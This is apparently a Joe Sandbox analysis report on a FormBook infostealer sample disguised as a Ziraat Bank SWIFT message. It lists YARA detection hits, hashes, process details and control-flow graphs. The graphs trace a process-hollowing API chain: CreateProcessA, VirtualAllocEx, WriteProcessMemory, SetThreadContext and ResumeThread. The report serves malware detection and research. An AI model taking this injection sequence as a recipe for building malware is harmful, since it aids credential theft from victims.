                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.341390351.000000000DF40000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.341390351.000000000DF40000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:high

                                                                  Target ID:10
                                                                  Start time:10:58:36
                                                                  Start date:21/11/2022
                                                                  Path:C:\Windows\SysWOW64\cscript.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                  Imagebase:0xbe0000
                                                                  File size:143360 bytes
                                                                  MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.507392181.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.507392181.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.507392181.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.507392181.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.506554045.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.506554045.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.506554045.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.506554045.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:high

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:9.2%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:121
                                                                    Total number of Limit Nodes:7
                                                                    execution_graph 16742 26a95f8 16743 26a9607 16742->16743 16746 26a96e0 16742->16746 16754 26a96f0 16742->16754 16747 26a9703 16746->16747 16748 26a971b 16747->16748 16762 26a9968 16747->16762 16766 26a9978 16747->16766 16748->16743 16749 26a9713 16749->16748 16750 26a9918 GetModuleHandleW 16749->16750 16751 26a9945 16750->16751 16751->16743 16755 26a9703 16754->16755 16756 26a971b 16755->16756 16760 26a9968 LoadLibraryExW 16755->16760 16761 26a9978 LoadLibraryExW 16755->16761 16756->16743 16757 26a9713 16757->16756 16758 26a9918 GetModuleHandleW 16757->16758 16759 26a9945 16758->16759 16759->16743 16760->16757 16761->16757 16763 26a996d 16762->16763 16764 26a99b1 16763->16764 16770 26a90e8 16763->16770 16764->16749 16767 26a998c 16766->16767 16768 26a90e8 LoadLibraryExW 16767->16768 16769 26a99b1 16767->16769 16768->16769 16769->16749 16771 26a9b58 LoadLibraryExW 16770->16771 16773 26a9bd1 16771->16773 16773->16764 16794 26abc18 DuplicateHandle 16795 26abcae 16794->16795 16730 7167710 16731 7167750 ResumeThread 16730->16731 16733 7167781 16731->16733 16734 7167d90 16735 7167d96 CreateProcessA 16734->16735 16737 7167fdb 16735->16737 16786 71677f0 16787 7167835 SetThreadContext 16786->16787 16789 716787d 16787->16789 16774 26ab9f0 GetCurrentProcess 16775 26aba6a GetCurrentThread 16774->16775 16776 26aba63 16774->16776 16777 26abaa0 16775->16777 16778 26abaa7 GetCurrentProcess 16775->16778 16776->16775 16777->16778 16781 26abadd 16778->16781 16779 26abb05 GetCurrentThreadId 16780 26abb36 16779->16780 16781->16779 16796 26a40d0 16797 26a40e2 16796->16797 16798 26a40ee 16797->16798 16802 26a41e1 16797->16802 16807 26a3880 16798->16807 16800 26a410d 16803 26a4205 16802->16803 16811 26a42e0 16803->16811 16815 26a42d0 16803->16815 16808 26a388b 16807->16808 16810 26a6a50 16808->16810 16823 26a59e8 16808->16823 16810->16800 16813 26a4307 16811->16813 16812 26a43e4 16812->16812 16813->16812 16819 26a3e08 16813->16819 16817 26a4307 16815->16817 16816 26a43e4 16816->16816 16817->16816 16818 26a3e08 CreateActCtxA 16817->16818 16818->16816 16820 26a5370 CreateActCtxA 16819->16820 16822 26a5433 16820->16822 16824 26a59f3 16823->16824 16827 26a5a18 16824->16827 16826 26a6b0d 16826->16810 16828 26a5a23 16827->16828 16831 26a5a48 16828->16831 16830 26a6be2 16830->16826 16832 26a5a53 16831->16832 16835 26a5a78 16832->16835 16834 26a6ce2 16834->16830 16836 26a5a83 16835->16836 16838 26a71a9 16836->16838 16841 26a7448 16836->16841 16837 26a743c 16837->16834 16838->16837 16846 26ab310 16838->16846 16842 26a7412 16841->16842 16844 26a744b 16841->16844 16843 26a743c 16842->16843 16845 26ab310 2 API calls 16842->16845 16843->16838 16844->16838 16845->16843 16847 26ab341 16846->16847 16848 26ab365 16847->16848 16851 26ab8c8 16847->16851 16855 26ab8d8 16847->16855 16848->16837 16852 26ab8e5 16851->16852 16853 26ab91f 16852->16853 16859 26ab6fc 16852->16859 16853->16848 16856 26ab8e5 16855->16856 16857 26ab91f 16856->16857 16858 26ab6fc 2 API calls 16856->16858 16857->16848 16858->16857 16860 26ab707 16859->16860 16862 26ac210 16860->16862 16863 26ab7e4 16860->16863 16862->16862 16864 26ab7ef 16863->16864 16865 26a5a78 2 API calls 16864->16865 16866 26ac27f 16864->16866 16865->16866 16870 26ae008 16866->16870 16876 26adff0 16866->16876 16867 26ac2b8 16867->16862 16871 26ae039 16870->16871 16873 26ae085 16870->16873 16872 26ae045 16871->16872 16874 26ae488 LoadLibraryExW GetModuleHandleW 16871->16874 16875 26ae479 LoadLibraryExW GetModuleHandleW 16871->16875 16872->16867 16873->16867 16874->16873 16875->16873 16878 26ae039 16876->16878 16879 26ae085 16876->16879 16877 26ae045 16877->16867 16878->16877 16880 26ae488 LoadLibraryExW GetModuleHandleW 16878->16880 16881 26ae479 LoadLibraryExW GetModuleHandleW 16878->16881 16879->16867 16880->16879 16881->16879 16738 7167b98 16739 7167be3 ReadProcessMemory 16738->16739 16741 7167c27 16739->16741 16782 7167988 16783 71679c8 VirtualAllocEx 16782->16783 16785 7167a05 16783->16785 16790 7167a78 16791 7167ac0 WriteProcessMemory 16790->16791 16793 7167b17 16791->16793

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 026ABA50
                                                                    • GetCurrentThread.KERNEL32 ref: 026ABA8D
                                                                    • GetCurrentProcess.KERNEL32 ref: 026ABACA
                                                                    • GetCurrentThreadId.KERNEL32 ref: 026ABB23
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261858484.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_26a0000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: 3c959ae50cdfc50625997d20271e420136249a628b805a654a90595f66266f61
                                                                    • Instruction ID: 3db53ff804826383d453a808f2b4327ee25a0fe7ec8e4e5df413192e9dd1c461
                                                                    • Opcode Fuzzy Hash: 3c959ae50cdfc50625997d20271e420136249a628b805a654a90595f66266f61
                                                                    • Instruction Fuzzy Hash: F95154B4A053488FDB10DFAAD588BAEBBF1EF48318F20845DE509A7750D734A944CF66
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 026ABA50
                                                                    • GetCurrentThread.KERNEL32 ref: 026ABA8D
                                                                    • GetCurrentProcess.KERNEL32 ref: 026ABACA
                                                                    • GetCurrentThreadId.KERNEL32 ref: 026ABB23
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261858484.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_26a0000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: 926f10bd7c832d42fe5b359531f2a64955de4cafe2bdcf381abe28f007ec4c7a
                                                                    • Instruction ID: b79d2d1ea6ab261747a8b165f013d007d5a7907555a6aaf53807588b5c35d8ad
                                                                    • Opcode Fuzzy Hash: 926f10bd7c832d42fe5b359531f2a64955de4cafe2bdcf381abe28f007ec4c7a
                                                                    • Instruction Fuzzy Hash: 375154B4A002488FDB10DFAAD588BEEBBF1EB48318F20845DE00AA7750D734A944CF65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 42 7167d50-7167d5c 43 7167d96-7167e25 42->43 44 7167d5e-7167d6a 42->44 49 7167e27-7167e31 43->49 50 7167e5e-7167e7e 43->50 46 7167d71-7167d78 44->46 47 7167d6c 44->47 47->46 49->50 51 7167e33-7167e35 49->51 58 7167eb7-7167ee6 50->58 59 7167e80-7167e8a 50->59 53 7167e37-7167e41 51->53 54 7167e58-7167e5b 51->54 56 7167e45-7167e54 53->56 57 7167e43 53->57 54->50 56->56 60 7167e56 56->60 57->56 65 7167f1f-7167fd9 CreateProcessA 58->65 66 7167ee8-7167ef2 58->66 59->58 61 7167e8c-7167e8e 59->61 60->54 63 7167e90-7167e9a 61->63 64 7167eb1-7167eb4 61->64 67 7167e9e-7167ead 63->67 68 7167e9c 63->68 64->58 79 7167fe2-7168068 65->79 80 7167fdb-7167fe1 65->80 66->65 69 7167ef4-7167ef6 66->69 67->67 70 7167eaf 67->70 68->67 71 7167ef8-7167f02 69->71 72 7167f19-7167f1c 69->72 70->64 74 7167f06-7167f15 71->74 75 7167f04 71->75 72->65 74->74 76 7167f17 74->76 75->74 76->72 90 716806a-716806e 79->90 91 7168078-716807c 79->91 80->79 90->91 92 7168070 90->92 93 716807e-7168082 91->93 94 716808c-7168090 91->94 92->91 93->94 95 7168084 93->95 96 7168092-7168096 94->96 97 71680a0-71680a4 94->97 95->94 96->97 98 7168098 96->98 99 71680b6-71680bd 97->99 100 71680a6-71680ac 97->100 98->97 101 71680d4 99->101 102 71680bf-71680ce 99->102 100->99 104 71680d5 101->104 102->101 104->104
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.282149902.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7160000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 716a5351a36259eb2b2f9ccd668c21791ee6ed7c6591ff0ad14a3835a0557d55
                                                                    • Instruction ID: ba7fbd0a5bb465f9b41e0e1ca80eb44d220cabaa371b6aba492b8455c0e38fe3
                                                                    • Opcode Fuzzy Hash: 716a5351a36259eb2b2f9ccd668c21791ee6ed7c6591ff0ad14a3835a0557d55
                                                                    • Instruction Fuzzy Hash: 3DA18DB1D00219CFDF11DF64C844BEEBBB2BF48308F1585A9D808A7280DB759999CF92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 105 7167d85-7167e25 109 7167e27-7167e31 105->109 110 7167e5e-7167e7e 105->110 109->110 111 7167e33-7167e35 109->111 117 7167eb7-7167ee6 110->117 118 7167e80-7167e8a 110->118 112 7167e37-7167e41 111->112 113 7167e58-7167e5b 111->113 115 7167e45-7167e54 112->115 116 7167e43 112->116 113->110 115->115 119 7167e56 115->119 116->115 124 7167f1f-7167fd9 CreateProcessA 117->124 125 7167ee8-7167ef2 117->125 118->117 120 7167e8c-7167e8e 118->120 119->113 122 7167e90-7167e9a 120->122 123 7167eb1-7167eb4 120->123 126 7167e9e-7167ead 122->126 127 7167e9c 122->127 123->117 138 7167fe2-7168068 124->138 139 7167fdb-7167fe1 124->139 125->124 128 7167ef4-7167ef6 125->128 126->126 129 7167eaf 126->129 127->126 130 7167ef8-7167f02 128->130 131 7167f19-7167f1c 128->131 129->123 133 7167f06-7167f15 130->133 134 7167f04 130->134 131->124 133->133 135 7167f17 133->135 134->133 135->131 149 716806a-716806e 138->149 150 7168078-716807c 138->150 139->138 149->150 151 7168070 149->151 152 716807e-7168082 150->152 153 716808c-7168090 150->153 151->150 152->153 154 7168084 152->154 155 7168092-7168096 153->155 156 71680a0-71680a4 153->156 154->153 155->156 157 7168098 155->157 158 71680b6-71680bd 156->158 159 71680a6-71680ac 156->159 157->156 160 71680d4 158->160 161 71680bf-71680ce 158->161 159->158 163 71680d5 160->163 161->160 163->163
                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07167FC6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.282149902.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7160000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: 4375b44caef66367ef97f3f209a9465999ba5b94abab476eb6b20bff605b5647
                                                                    • Instruction ID: a5beb0702a1f43519c5433de8b526387dfe5e9afc379aa27e8308e5079f791fa
                                                                    • Opcode Fuzzy Hash: 4375b44caef66367ef97f3f209a9465999ba5b94abab476eb6b20bff605b5647
                                                                    • Instruction Fuzzy Hash: A6A18DB1D00219DFDF21DF64C844BEEBBB2BF48304F1485A9E818A7280DB759995CF92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 164 7167d90-7167e25 167 7167e27-7167e31 164->167 168 7167e5e-7167e7e 164->168 167->168 169 7167e33-7167e35 167->169 175 7167eb7-7167ee6 168->175 176 7167e80-7167e8a 168->176 170 7167e37-7167e41 169->170 171 7167e58-7167e5b 169->171 173 7167e45-7167e54 170->173 174 7167e43 170->174 171->168 173->173 177 7167e56 173->177 174->173 182 7167f1f-7167fd9 CreateProcessA 175->182 183 7167ee8-7167ef2 175->183 176->175 178 7167e8c-7167e8e 176->178 177->171 180 7167e90-7167e9a 178->180 181 7167eb1-7167eb4 178->181 184 7167e9e-7167ead 180->184 185 7167e9c 180->185 181->175 196 7167fe2-7168068 182->196 197 7167fdb-7167fe1 182->197 183->182 186 7167ef4-7167ef6 183->186 184->184 187 7167eaf 184->187 185->184 188 7167ef8-7167f02 186->188 189 7167f19-7167f1c 186->189 187->181 191 7167f06-7167f15 188->191 192 7167f04 188->192 189->182 191->191 193 7167f17 191->193 192->191 193->189 207 716806a-716806e 196->207 208 7168078-716807c 196->208 197->196 207->208 209 7168070 207->209 210 716807e-7168082 208->210 211 716808c-7168090 208->211 209->208 210->211 212 7168084 210->212 213 7168092-7168096 211->213 214 71680a0-71680a4 211->214 212->211 213->214 215 7168098 213->215 216 71680b6-71680bd 214->216 217 71680a6-71680ac 214->217 215->214 218 71680d4 216->218 219 71680bf-71680ce 216->219 217->216 221 71680d5 218->221 219->218 221->221
                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07167FC6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.282149902.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7160000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: 6f89286bfab4294a7c0ebaff9979c48d518149edcd977eb07f0c5d353cf1db29
                                                                    • Instruction ID: f03a8461cae885f4733aa93cd63456488aca3aa169c1f1b6ca77955564822440
                                                                    • Opcode Fuzzy Hash: 6f89286bfab4294a7c0ebaff9979c48d518149edcd977eb07f0c5d353cf1db29
                                                                    • Instruction Fuzzy Hash: 9A917CB1D00219CFDF21DF64C844BEEBBB2BF48314F1485A9D819A7280DB759995CF92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 222 26a96f0-26a96f8 223 26a9703-26a9705 222->223 224 26a96fe call 26a9084 222->224 225 26a971b-26a971f 223->225 226 26a9707 223->226 224->223 227 26a9733-26a9774 225->227 228 26a9721-26a972b 225->228 275 26a970d call 26a9968 226->275 276 26a970d call 26a9978 226->276 233 26a9781-26a978f 227->233 234 26a9776-26a977e 227->234 228->227 229 26a9713-26a9715 229->225 231 26a9850-26a9910 229->231 270 26a9918-26a9943 GetModuleHandleW 231->270 271 26a9912-26a9915 231->271 235 26a97b3-26a97b5 233->235 236 26a9791-26a9796 233->236 234->233 238 26a97b8-26a97bf 235->238 239 26a9798-26a979f call 26a9090 236->239 240 26a97a1 236->240 243 26a97cc-26a97d3 238->243 244 26a97c1-26a97c9 238->244 241 26a97a3-26a97b1 239->241 240->241 241->238 247 26a97e0-26a97e9 call 26a90a0 243->247 248 26a97d5-26a97dd 243->248 244->243 253 26a97eb-26a97f3 247->253 254 26a97f6-26a97fb 247->254 248->247 253->254 255 26a9819-26a981d 254->255 256 26a97fd-26a9804 254->256 277 26a9820 call 26a9c50 255->277 278 26a9820 call 26a9c80 255->278 256->255 258 26a9806-26a9816 call 26a90b0 call 26a90c0 256->258 258->255 260 26a9823-26a9826 263 26a9828-26a9846 260->263 264 26a9849-26a984f 260->264 263->264 272 26a994c-26a9960 270->272 273 26a9945-26a994b 270->273 271->270 273->272 275->229 276->229 277->260 278->260
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 026A9936
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261858484.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_26a0000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 547cc87da232314e2902cd16bd4d47581db220b8b28d13e5c09d670566c714d1
                                                                    • Instruction ID: 8a7974fd1a369515f360429f61bfbb3917fa847e4688c5950d94684df298d2bc
                                                                    • Opcode Fuzzy Hash: 547cc87da232314e2902cd16bd4d47581db220b8b28d13e5c09d670566c714d1
                                                                    • Instruction Fuzzy Hash: 4F710370A01B058FDB24DF2AD151B5ABBF1BF88344F14892DD54A97B40DB35E9058FA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 296 26a5365-26a5431 CreateActCtxA 298 26a543a-26a5494 296->298 299 26a5433-26a5439 296->299 306 26a54a3-26a54a7 298->306 307 26a5496-26a5499 298->307 299->298 308 26a54b8 306->308 309 26a54a9-26a54b5 306->309 307->306 311 26a54b9 308->311 309->308 311->311
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 026A5421
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261858484.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_26a0000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: fd7437ac10c047bbff642e6c846acff47e571e293894328864debf409701a867
                                                                    • Instruction ID: 1b654f4341875189bff94c12d9ae1a98e273dd96d2761a31a300942fc5a338d3
                                                                    • Opcode Fuzzy Hash: fd7437ac10c047bbff642e6c846acff47e571e293894328864debf409701a867
                                                                    • Instruction Fuzzy Hash: 8941F1B0D00618CFDB24DFA9C844B9EBBB1FF88309F618069D409BB250DB75694ACF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 279 26a3e08-26a5431 CreateActCtxA 282 26a543a-26a5494 279->282 283 26a5433-26a5439 279->283 290 26a54a3-26a54a7 282->290 291 26a5496-26a5499 282->291 283->282 292 26a54b8 290->292 293 26a54a9-26a54b5 290->293 291->290 295 26a54b9 292->295 293->292 295->295
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 026A5421
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261858484.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_26a0000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 7665f466d57c774c422d209fd91cd3e28fdc0e31af67200df8cc8c174ba9728e
                                                                    • Instruction ID: a9050123607434cc8e0515f5d610a2d207e099f33176df5713dfc10b083ca73b
                                                                    • Opcode Fuzzy Hash: 7665f466d57c774c422d209fd91cd3e28fdc0e31af67200df8cc8c174ba9728e
                                                                    • Instruction Fuzzy Hash: 9341F270D04618CBDB24DFA9C844B8EBBB5FF88309F608069D409BB251D775694ACF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 312 7167a39-7167a40 313 7167a42-7167a52 312->313 314 7167a6c-7167ac6 312->314 316 7167a54 313->316 317 7167a59-7167a60 313->317 320 7167ad6-7167b15 WriteProcessMemory 314->320 321 7167ac8-7167ad4 314->321 316->317 323 7167b17-7167b1d 320->323 324 7167b1e-7167b4e 320->324 321->320 323->324
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07167B08
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.282149902.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7160000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: e5a7d9bee71d4b51e17773fc84bf1b809851b45efbb2afdd71989d9a4680152c
                                                                    • Instruction ID: 41d7d7ef4c4753b5a2146f0d6cb1f8ef5645f7c17cbd31548b4984e5ed2aaada
                                                                    • Opcode Fuzzy Hash: e5a7d9bee71d4b51e17773fc84bf1b809851b45efbb2afdd71989d9a4680152c
                                                                    • Instruction Fuzzy Hash: 3631ADB19053599FCB01CFA9C844BDEBFF5FF48314F04842AE948A7281D778A954CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 338 7167b90-7167c25 ReadProcessMemory 342 7167c27-7167c2d 338->342 343 7167c2e-7167c5e 338->343 342->343
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07167C18
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.282149902.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7160000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    • Opcode ID: f744fb4808b9d395e0a5b08716fa2f0820872cc4cff9bda773546be3de13c2fe
                                                                    • Instruction ID: 29f39a047c6e510e5b2314563a8175341c470fbbffc89b5bbe93ee329bbbfc95
                                                                    • Opcode Fuzzy Hash: f744fb4808b9d395e0a5b08716fa2f0820872cc4cff9bda773546be3de13c2fe
                                                                    • Instruction Fuzzy Hash: 2A2139B19003199FCB00DFA9C884BEEBBF5FF48324F50842AE519A7240D775A954CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 328 7167a78-7167ac6 330 7167ad6-7167b15 WriteProcessMemory 328->330 331 7167ac8-7167ad4 328->331 333 7167b17-7167b1d 330->333 334 7167b1e-7167b4e 330->334 331->330 333->334
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07167B08
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.282149902.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7160000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: 0d0643c3d0c997859f2b71b6aff20d5b483a27a6aab1614b45054471681954bc
                                                                    • Instruction ID: 5cb7d25679be60c17eba971981d6804ba696b189fa7c110c955148389063b73f
                                                                    • Opcode Fuzzy Hash: 0d0643c3d0c997859f2b71b6aff20d5b483a27a6aab1614b45054471681954bc
                                                                    • Instruction Fuzzy Hash: B22128B19003599FCB00CFA9C884BDEBBF5FF48314F548429E919A7240D774A954CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 347 71677e9-716783b 350 716783d-7167849 347->350 351 716784b-716787b SetThreadContext 347->351 350->351 353 7167884-71678b4 351->353 354 716787d-7167883 351->354 354->353
                                                                    APIs
                                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 0716786E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.282149902.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7160000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: ContextThread
                                                                    • String ID:
                                                                    • API String ID: 1591575202-0
                                                                    • Opcode ID: 1853fb0c3f001490bdfa38fbee4b244184b49dc8b3861c0eedcb47242dff6c0d
                                                                    • Instruction ID: 9ab168d9537e0c446f7ffa9e767697b1001e382f953ff289e1a7adf9a6377579
                                                                    • Opcode Fuzzy Hash: 1853fb0c3f001490bdfa38fbee4b244184b49dc8b3861c0eedcb47242dff6c0d
                                                                    • Instruction Fuzzy Hash: 9E216D71D003199FCB10CFA9C485BEEBBF4EF88358F048429D519A7240C778A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 373 7167b98-7167c25 ReadProcessMemory 376 7167c27-7167c2d 373->376 377 7167c2e-7167c5e 373->377 376->377
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07167C18
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.282149902.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7160000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
